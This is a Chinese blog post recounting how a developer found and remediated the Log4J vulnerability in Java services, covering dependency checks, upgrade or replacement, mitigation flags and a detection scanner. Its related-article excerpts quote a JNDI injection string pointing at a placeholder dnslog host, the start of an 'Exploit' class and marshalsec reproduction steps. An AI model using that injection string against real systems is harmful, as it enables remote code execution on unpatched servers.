记Java程序Log4J漏洞的解决过程

最新推荐文章于 2024-06-03 15:52:37 发布
最新推荐文章于 2024-06-03 15:52:37 发布
阅读量476 收藏 1
点赞数
分类专栏: Java PC技术 文章标签: java 后端 log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33391499/article/details/122282923
版权
阅文时长| 0.51分钟字数统计| 827.2字符
主要内容| 1、引言&背景 2、检查依赖项中是否依赖了Log4J 3、侦测工具侦测结果 4、声明与参考资料
『记Java程序Log4J漏洞的解决过程』
编写人| SCscHero 编写时间| 2022/1/2 PM6:35
文章类型| 系列完成度| 已完成
座右铭每一个伟大的事业,都有一个微不足道的开始。

一、引言&背景   完成度:100%

a) 问题&时间线

  1. 开始知道Log4J漏洞是公司的安全邮件:大约是21年12月10号下午收到的邮件,知道了这个组件的漏洞。
  2. 我是在11号下午对Log4J组件做的修复(实际上时间已经晚了,我们另一个Java团队就在10号晚上当天做了升级):我们主要是使用的.Net技术栈,少部分使用的是Python、Java Spring Boot的WebAPI结构。后来和几个搞网安的朋友以及搞Java的朋友讨论了一下,并且参加了公司组织的安全运维的会议,制定了解决方案。最后用长亭的工具扫描了没问题了,汇报了老板。
  3. 那么写这篇文章时间现在已经是元旦了,确实很晚了,之前忙于开发任务没时间写博文,现在元旦得空了写写记录一下。相信很多朋友已经经历完了这个漏洞,如果还有朋友没搞得,希望也能帮助一点吧~???

b) Log4J漏洞影响范围

  1. 使用了Log4J版本大于2.0且小于 2.15.0-rc1。
  2. 使用Apache Log4j 1.X版本的应用,若开发者对JMS Appender利用不当,可对应用产生潜在的安全影响。

c) 解决思路

  1. 先根据Log4J的影响范围,需要确认项目中是否使用了Log4J组件,手动检查Maven的依赖项,以及依赖项的依赖项中是否存在。详情可见第二章的一种方法,当然也有很多办法都可以参考。
  2. 若使用了Log4J组件,且版本在漏洞影响范围内,则需制定方案。
  3. 【方案1】按照Log4J2最新推出的版本进行升级,升级到Apache官方打Patch的版本。
  4. 【方案2】替换掉Log4J的组件,一Java朋友建议替换成LogBack。
  5. 【方案3-缓解措施】添加jvm启动参数:-Dlog4j2.formatMsgNoLookups=true;在应用classpath下添加log4j2.component.properties配置文件,文件内容为:log4j2.formatMsgNoLookups=true;JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;限制受影响应用对外访问互联网,并在边界对dnslog相关域名访问进行检测。
  6. 通过一个安全运维大佬们都推荐的链接:https://log4j2-detector.chaitin.cn/。下载侦测工具,检验下效果。我用的是V2版本的侦测工具。

二、检查依赖项中是否依赖了Log4J   完成度:100%

记一个方法。IDEA的可视化工具,可以反馈出依赖项是否又依赖了Log4J。在Maven项目中右击Show Dependencies。

显示如下图:

三、侦测工具侦测结果   完成度:100%

使用了侦测工具扫描结果如图:

四、声明与参考资料   完成度:100%

原创博文,未经许可请勿转载。

如有帮助,欢迎点赞、收藏、关注。如有问题,请评论留言!如需与博主联系的,直接博客私信SCscHero即可。

SCscHero
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2.17.2
04-14
此次,我们聚焦于“log4j2.17.2漏洞修复程序包”,深入探讨该版本如何解决这一安全隐患。 Log4j2漏洞(CVE-2021-44228)的本质在于,攻击者可以通过操纵日志输入,触发JNDI(Java Naming and Directory Interface)...
【实战】一次简单的log4j漏洞测试
crowsec
12-19 3420
【实战】一次简单的log4j漏洞测试
spring-boot-starter-log4j2漏洞修复方式
dhj8933的博客
12-14 4101
spring-boot-starter-log4j2漏洞修复方式
Web网络安全-----Log4j高危漏洞原理及修复_log4j漏洞是什么
最新发布
weixin_42340783的博客
06-03 1220
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
【渗透测试】log4j漏洞复现和漏洞修复方案
Yb528970805的博客
09-16 1976
2021年12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。Log4j 是一款开源 Java 日志录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Log4j漏洞解决方案,亲测
weixin_42492886的博客
12-14 1万+
log4j漏洞解决方案,亲测
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7880
log4j漏洞原理和靶场复现
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
12-16
Log4j是一个广泛使用的Java日志录框架,它允许开发者在应用程序中轻松地录各种级别的日志信息,如DEBUG、INFO、WARN、ERROR等。在2021年底,一个重大的安全漏洞(CVE-2021-44228)被发现在Log4j2的早期版本中,...
log4j远程执行漏洞,测试源码
12-22
通常,这样的资源会包含一个可运行的示例,展示如何利用Log4j漏洞,或者帮助开发者检测其应用中的漏洞。 **Log4j远程执行漏洞详解** Log4j是Apache的一个开源日志框架,广泛用于Java应用程序,用于录应用程序...
log4j漏洞排查小工具
12-20
标题中的“log4j漏洞排查小工具”指的是一个专门设计用于检测和解决Apache Log4j安全漏洞程序Log4j是一个广泛使用的Java日志框架,而2021年曝光的重大漏洞(被称为Log4Shell或CVE-2021-44228)允许攻击者通过...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
使用这些检测工具,用户可以快速定位并解决Log4j2漏洞,防止恶意攻击者利用该漏洞对系统进行控制。重要的是,不仅要运行这些工具,还应结合其他安全措施,例如更新到最新的Log4j2补丁版本,审查和加固日志配置,以及...
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
springboot启动报错
aaaaaaaaaaaaam的博客
06-26 258
Log4j2 could not find a logging implementation 添加maven依赖 org.apache.logging.log4j log4j-core 2.10.0 org.apache.logging.log4j log4j-api 2.10.0
Log4J 漏洞复现
qq_42307546的博客
12-13 2845
介绍:log4j是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布 log4j存在远程代码执行漏洞,通过lookup来触发漏洞详情参考 https://zhuanlan.zhihu.com/p/444140910 首先我们需要编写一个恶意的类然后编译成class文件 public class Exploit { public Exploit(){ try{ // 要执行的命令 String[] comma
log4j漏洞产生方法和预防
Koikoi12的博客
12-13 4125
产生方法 https://0xsapra.github.io/website/CVE-2019-17571 核心部分${jndi:ldap://xxxxx.dnslog.cn/exp} 想办法把用户输入的可执行字符串送到这个位置就行了,日志里经常打印请求参数之类用户输入的内容,比如"参数a:<请求的输入 预防 Apache Log4j 远程代码执行漏洞 影响版本 经验证 2.15.0-rc1 版本存在绕过,实际受影响范围如下: Apache Log4j 2.x < 2.15.0-rc2 安全
Log4j 漏洞测试
『愚』的博客
12-13 1633
Log4j 漏洞测试 介绍在windows下进行 Log4j 漏洞测试,linux上步骤也都一样。 1、参照项目,项目地址: https://github.com/mbechler/marshalsec 克隆代码到本地,mvn clean package -DskipTests打包,target 目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar 2、新建一个普通的 java 类,等会将此类注入到待测试的项目中。可以随便写逻辑 (生成文件、定时关机等) 示例: 功能是在wind
一次log4j漏洞修复与吐槽
weixin_44718708的博客
12-21 532
关于log4j漏洞修复与吐槽,然后为什么不使用logback呢?
log4j漏洞的产生原因和解决方案,零基础都能看懂
weixin_36469852的博客
12-13 858
核弹级bug Log4j,相信很多人都有所耳闻了,这两天很多读者都在问我关于这个bug的原理等一些问题,今天咱们就专门写一篇文章,一起聊一聊这个核弹级别的bug的产生原理以及怎么防止 产生原因 其实这个主要的原因,和日志有关,日志是应用软件中不可缺少的部分,Apache的开源项目log4j是一个功能强大的日志组件,提供方便的日志录。 最简单的日志打印 我们看如下场景: 这个场景大家应该很熟悉了,就是用户登录,咱们今天不用关心登录是怎么实现的,只用关心用户名name字段就可以了,代码如下
严重危害警告 Log4j 执行漏洞被公开
qq_53058639的博客
02-14 1170
12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。Log4j2 是一个基于 Java 的日志录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程Log4j 是目前全球使用最广泛的 java 日志框架之一。
LOG4J 漏洞深度分析与安全自查指南
Apache Log4j2是Java应用程序广泛采用的日志录框架,它允许开发者方便地录应用程序的运行日志。然而,LOG4J2-3201漏洞(通常称为Log4Shell)是在Log4j2版本2.10.0中发现的一个重大安全缺陷。该漏洞源于Log4j2的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值